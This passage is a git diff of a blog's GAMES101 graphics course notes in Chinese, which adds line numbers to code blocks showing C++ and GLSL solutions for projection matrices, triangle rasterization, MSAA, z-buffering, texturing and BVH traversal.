      Eigen::Matrix4f get_model_matrix(float rotation_angle)
      {
      Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

      // TODO: Implement this function
      // Create the model matrix for rotating the triangle around the Z axis.
      // Then return it.

      float angle = rotation_angle * MY_PI / 180.0f;

      Eigen::Matrix4f translate;
      translate << std::cos(angle), -std::sin(angle), 0, 0,
      std::sin(angle), std::cos(angle), 0, 0,
      0, 0, 1, 0,
      0, 0, 0, 1;
      model = translate * model;
      return model;
      }
      • get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): 使用给定的参数逐个元素地构建透视投影矩阵并返回该矩阵。
      @@ -1118,11 +1116,11 @@

      HW1

      png

      具体地,如上图,zNear 即为 $n$,zFar 即为 $z$,$\frac yz=\tan{(\mathrm{eye_fov}/2)}$。

      由于右手坐标系 $n$ 和 $f$ 为负,因此:

      -
      float angle = eye_fov * MY_PI / 180.0f;
      float n = -zNear;
      float f = -zFar;
      float t = std::tan(angle / 2) * n;
      float b = -t;
      float r = t * aspect_ratio;
      float l = -r;
      +
      1
      2
      3
      4
      5
      6
      7
      float angle = eye_fov * MY_PI / 180.0f;
      float n = -zNear;
      float f = -zFar;
      float t = std::tan(angle / 2) * n;
      float b = -t;
      float r = t * aspect_ratio;
      float l = -r;

      最后 $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$ 即为所求。

      完整代码:

      -
      Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
      float zNear, float zFar)
      {
      // Students will implement this function

      Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

      // TODO: Implement this function
      // Create the projection matrix for the given parameters.
      // Then return it.

      Eigen::Matrix4f M_P;
      M_P << zNear, 0, 0, 0,
      0, zNear, 0, 0,
      0, 0, zNear + zFar, -(zNear * zFar),
      0, 0, 1, 0;

      float angle = eye_fov * MY_PI / 180.0f;
      float n = -zNear;
      float f = -zFar;
      float t = std::tan(angle / 2) * n;
      float b = -t;
      float r = t * aspect_ratio;
      float l = -r;

      Eigen::Matrix4f M_T;
      M_T << 1, 0, 0, -(r + l) / 2,
      0, 1, 0, -(t + b) / 2,
      0, 0, 1, -(n + f) / 2,
      0, 0, 0, 1;

      Eigen::Matrix4f M_S;
      M_S << 2 / (r - l), 0, 0, 0,
      0, 2 / (t - b), 0, 0,
      0, 0, 2 / (f - n), 0,
      0, 0, 0, 1;

      projection = M_T * M_S * M_P * projection;
      return projection;
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
      float zNear, float zFar)
      {
      // Students will implement this function

      Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

      // TODO: Implement this function
      // Create the projection matrix for the given parameters.
      // Then return it.

      Eigen::Matrix4f M_P;
      M_P << zNear, 0, 0, 0,
      0, zNear, 0, 0,
      0, 0, zNear + zFar, -(zNear * zFar),
      0, 0, 1, 0;

      float angle = eye_fov * MY_PI / 180.0f;
      float n = -zNear;
      float f = -zFar;
      float t = std::tan(angle / 2) * n;
      float b = -t;
      float r = t * aspect_ratio;
      float l = -r;

      Eigen::Matrix4f M_T;
      M_T << 1, 0, 0, -(r + l) / 2,
      0, 1, 0, -(t + b) / 2,
      0, 0, 1, -(n + f) / 2,
      0, 0, 0, 1;

      Eigen::Matrix4f M_S;
      M_S << 2 / (r - l), 0, 0, 0,
      0, 2 / (t - b), 0, 0,
      0, 0, 2 / (f - n), 0,
      0, 0, 0, 1;

      projection = M_T * M_S * M_P * projection;
      return projection;
      }

      运行时:

      • n = -0.1
      • @@ -1136,7 +1134,7 @@

        HW1

        提高项:在 main.cpp 中构造一个函数,该函数的作用是得到绕任意
        过原点的轴的旋转变换矩阵。Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

        代公式:$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

        -
        Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
        {
        Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

        float alpha = angle * MY_PI / 180.0f;
        float nx = axis[0];
        float ny = axis[1];
        float nz = axis[2];
        Eigen::Matrix3f M;
        M <<
        0, -nz, ny,
        nz, 0, -nx,
        -ny, nx, 0;
        Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
        Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
        translate.block<3, 3>(0, 0) = R;

        model = translate * model;
        return model;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
        {
        Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

        float alpha = angle * MY_PI / 180.0f;
        float nx = axis[0];
        float ny = axis[1];
        float nz = axis[2];
        Eigen::Matrix3f M;
        M <<
        0, -nz, ny,
        nz, 0, -nx,
        -ny, nx, 0;
        Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
        Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
        translate.block<3, 3>(0, 0) = R;

        model = translate * model;
        return model;
        }
        @@ -5079,6 +5077,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" index 8708c216f7..fa0c812a74 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2102\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -631,7 +629,7 @@

        for (int x = 0; x < xmax; ++x) 
        output[x] = f(x);
        +
        1
        2
        for (int x = 0; x < xmax; ++x) 
        output[x] = f(x);

        Sampling is a core idea in graphics.

        采样是图形的核心思想。
        We sample time (1D), area (2D), direction (2D), volume (3D) …

        @@ -639,7 +637,7 @@

        for (int x = 0; x < xmax; ++x)
        for (int y = 0; y < ymax; ++y)
        image[x][y] = inside(tri, x + 0.5, y + 0.5);
        +
        1
        2
        3
        for (int x = 0; x < xmax; ++x)
        for (int y = 0; y < ymax; ++y)
        image[x][y] = inside(tri, x + 0.5, y + 0.5);

        通过判断像素点是否在三角形内部来决定上色。

        Inside? Recall: Three Cross Products!

        判断像素点是否在像素点内部可以用向量叉积来表示。

        @@ -937,7 +935,7 @@

        HW2


    rasterize_triangle(): 执行三角形栅格化算法

    -
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();
    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    if (insideTriangle(x + 0.5, y + 0.5, t.v))
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, t.getColor());
    }
    }
    }
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();
    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    if (insideTriangle(x + 0.5, y + 0.5, t.v))
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, t.getColor());
    }
    }
    }
    }
    }

    static bool insideTriangle(): 测试点是否在三角形内

    @@ -954,10 +952,10 @@

    HW2

    这种方法基于向量的叉乘性质,通过检查叉乘结果的符号来判断点 P 是否在三角形内部。如果叉乘结果都具有相同的符号,那么点 P 在三角形的同一侧,即在三角形内部。如果叉乘结果具有不同的符号,那么点 P 在三角形的两侧,即不在三角形内部。

    请注意,这种方法只适用于点和三角形都位于同一平面上的情况。

    -
    static bool insideTriangle(int x, int y, const Vector3f* _v)
    {
    // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
    Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
    Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
    Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
    Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
    Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
    Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
    return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    static bool insideTriangle(int x, int y, const Vector3f* _v)
    {
    // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
    Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
    Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
    Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
    Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
    Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
    Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
    return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
    }

    $2\times2$ MSAA:

    -
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();

    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    float rate = 0.0f;
    if (insideTriangle(x + 0.25, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.75, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.25, y + 0.75, t.v))
    rate += 0.25f;
    if (rate > 0.0f)
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, rate * t.getColor());
    }
    }
    }
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();

    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    float rate = 0.0f;
    if (insideTriangle(x + 0.25, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.75, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.25, y + 0.75, t.v))
    rate += 0.25f;
    if (rate > 0.0f)
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, rate * t.getColor());
    }
    }
    }
    }
    }
    @@ -4900,6 +4898,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" index affa420ffb..9bde5bde69 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -479,7 +477,7 @@

    Visibi

    Z-Buffer Algorithm

    将深度缓冲区初始化为 $\infty$
    During rasterization 光栅化过程中:

    -
    for (each triangle T)
    for (each sample (x,y,z) in T)
    if (z < zbuffer[x,y]) // closest sample so far 如果当前深度值比深度缓冲区里的还要小(这个三角形离摄像机更近)
    framebuffer[x,y] = rgb; // update color 更新帧缓冲区里的颜色
    zbuffer[x,y] = z; // update depth 更新深度缓冲区里的深度
    else
    ; // do nothing, this sample is occluded 这个三角形被遮挡了,不管它了
    +
    1
    2
    3
    4
    5
    6
    7
    for (each triangle T)
    for (each sample (x,y,z) in T)
    if (z < zbuffer[x,y]) // closest sample so far 如果当前深度值比深度缓冲区里的还要小(这个三角形离摄像机更近)
    framebuffer[x,y] = rgb; // update color 更新帧缓冲区里的颜色
    zbuffer[x,y] = z; // update depth 更新深度缓冲区里的深度
    else
    ; // do nothing, this sample is occluded 这个三角形被遮挡了,不管它了

    png

    ​ 示例。一开始深度缓冲区里的深度值都是 $R$(无限)。先渲染红的,再渲染紫的。紫色的深度值如果比红的小,就覆盖掉。


    @@ -874,7 +872,7 @@

    Graphics pipelin

    描述某个顶点或片元颜色的操作

    -
    uniform sampler2D myTexture; // program parameter 程序参数
    uniform vec3 lightDir; // program parameter 程序参数
    varying vec2 uv; // per fragment value (interp. by rasterizer) 每个片元特有的值
    varying vec3 norm; // per fragment value (interp. by rasterizer) 每个片元特有的值

    void diffuseShader()
    {
    vec3 kd; // 漫反射系数(颜色)
    kd = texture2d(myTexture, uv); // material color from texture 从 UV 贴图中获取材质颜色
    kd *= clamp(dot(–lightDir, norm), 0.0, 1.0); // Lambertian shading model,应用兰伯特漫反射光照模型,将 kd 乘以后面这东西得到 Ld(漫反射光)
    gl_FragColor = vec4(kd, 1.0); // output fragment color 输出片元颜色
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    uniform sampler2D myTexture; // program parameter 程序参数
    uniform vec3 lightDir; // program parameter 程序参数
    varying vec2 uv; // per fragment value (interp. by rasterizer) 每个片元特有的值
    varying vec3 norm; // per fragment value (interp. by rasterizer) 每个片元特有的值

    void diffuseShader()
    {
    vec3 kd; // 漫反射系数(颜色)
    kd = texture2d(myTexture, uv); // material color from texture 从 UV 贴图中获取材质颜色
    kd *= clamp(dot(–lightDir, norm), 0.0, 1.0); // Lambertian shading model,应用兰伯特漫反射光照模型,将 kd 乘以后面这东西得到 Ld(漫反射光)
    gl_FragColor = vec4(kd, 1.0); // output fragment color 输出片元颜色
    }

    Shader function executes once per fragment.

    Shader 函数对每个片元执行一次(因此不用像 C 语言那样遍历所有顶点,它自动帮你遍历好了)。

      @@ -1041,7 +1039,7 @@

      Bary

      Texture queries

      Simple Texture Mapping: Diffuse Color

      简单纹理映射:漫反射颜色

      -
      for each rasterized screen sample (x, y):  # 对于每个栅格化屏幕样本(x, y),通常是像素中心
      (u, v) = evaluate texture coordinate at (x, y) # 在 (x, y) 计算纹理坐标 (u, v),Using barycentric coordinates!
      texcolor = texture.sample(u, v); # 从 (u, v) 出获取颜色
      set sample’s color to texcolor; # 设置样本的颜色为 texcolor,通常是漫射反照率 Kd,(回想一下 Blinn-Phong 反射模型)
      +
      1
      2
      3
      4
      for each rasterized screen sample (x, y):  # 对于每个栅格化屏幕样本(x, y),通常是像素中心
      (u, v) = evaluate texture coordinate at (x, y) # 在 (x, y) 计算纹理坐标 (u, v),Using barycentric coordinates!
      texcolor = texture.sample(u, v); # 从 (u, v) 出获取颜色
      set sample’s color to texcolor; # 设置样本的颜色为 texcolor,通常是漫射反照率 Kd,(回想一下 Blinn-Phong 反射模型)

      Texture Magnification - Easy Case

      纹理贴图太小了怎么办?

      @@ -5168,6 +5166,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" index 1de853216f..b0e68a3749 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -5467,6 +5465,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" index 6b485f76cc..89e573b7be 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -1108,7 +1106,7 @@

      BVH Traversal

      png

      -
      Intersect(Ray ray, BVH node) {
      if (ray misses node.bbox) return;
      if (node is a leaf node)
      test intersection with all objs;
      return closest intersection;
      hit1 = Intersect(ray, node.child1);
      hit2 = Intersect(ray, node.child2);
      return the closer of hit1, hit2;
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      Intersect(Ray ray, BVH node) {
      if (ray misses node.bbox) return;
      if (node is a leaf node)
      test intersection with all objs;
      return closest intersection;
      hit1 = Intersect(ray, node.child1);
      hit2 = Intersect(ray, node.child2);
      return the closer of hit1, hit2;
      }

      ​ 递归地检测是否相交。


      Spatial vs Object Partitions

      @@ -6056,6 +6054,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" index ec04d5e5a3..7a3fde90ed 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -721,7 +719,7 @@

      Measuring BRDFs

      Measuring BRDFs

      General approach:

      ​ 一般的做法:

      -
      foreach outgoing direction wo 对于每个出射方向 wo
      move light to illuminate surface with a thin beam from wo 移动光线,使来自 wo 的细光束照亮表面
      for each incoming direction wi 对于每个入射方向 wi
      move sensor to be at direction wi from surface 移动传感器,使其位于距表面 wi 方向
      measure incident radiance 测量入射辐射度
      +
      1
      2
      3
      4
      5
      foreach outgoing direction wo 对于每个出射方向 wo
      move light to illuminate surface with a thin beam from wo 移动光线,使来自 wo 的细光束照亮表面
      for each incoming direction wi 对于每个入射方向 wi
      move sensor to be at direction wi from surface 移动传感器,使其位于距表面 wi 方向
      measure incident radiance 测量入射辐射度

      Improving efficiency:

      ​ 提高效率:

        @@ -5606,6 +5604,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2107\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2107\357\274\211/index.html" index 45ec6adbac..8a340e4ba5 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2107\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2107\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -5603,6 +5601,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2108\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2108\357\274\211/index.html" index 4489c08fbd..3978c9316c 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2108\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2108\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -5367,6 +5365,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Animation/index.html b/posts/GAMES104-Animation/index.html index 991b75c55d..86ad400022 100644 --- a/posts/GAMES104-Animation/index.html +++ b/posts/GAMES104-Animation/index.html @@ -44,8 +44,6 @@ - - @@ -1410,7 +1408,7 @@

        struct Joint {
